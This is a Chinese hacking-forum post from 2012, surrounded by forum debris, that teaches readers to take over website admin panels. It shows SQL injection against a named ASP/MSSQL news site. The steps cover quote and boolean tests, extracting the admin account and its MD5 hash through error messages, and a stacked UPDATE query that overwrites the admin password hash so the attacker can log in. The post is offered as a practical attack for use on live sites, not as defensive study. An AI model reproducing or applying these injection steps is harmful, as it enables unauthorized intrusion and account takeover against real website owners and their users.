经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
$ R5 W* K3 x$ A- }, J6 l* [可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)( `* R4 L3 D' e: r+ D3 i; A
测试如下:
/ \, G/ e9 Y; M% g, w( Zhttp://www.tmdsb.com/news.asp?id=121
& i, o4 k+ A8 w/ |, `3 p在地址后输入单引号,显示' S; Z7 ?& \7 t0 h/ j
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’3 J6 v D& z: i* @* `$ N7 a
字符串 ’’’ 之前有未闭合的引号9 u( j- I+ ?1 [9 h5 g7 |
/news/tmdws.asp,行63
; x- j- V, ^: k3 o/ k说明没有过滤单引号且数据库是MSSQL.
$ u- h9 }% w3 h# o5 g! T: nand 1=1正常。and 1=2出错。肯定存在注入
5 m4 ?) I) [7 ]" [接着输入/ c! T) V" r* }6 e
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)5 U) L" r5 p: d) z1 y
得到帐号为:admin
6 Z3 T# o1 i1 qhttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
& X9 v2 |1 D' g" C5 I6 O得到密码为:a4716077c2ba075c
; F6 {* D: r0 [, O( J9 H- O* |接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
% w# N$ M9 `; v/ f命令如下 :1 C& ]4 R$ c. C( J" ?1 `% n
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–) v! v/ j- a" p) p. |- f. c: I' Y
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41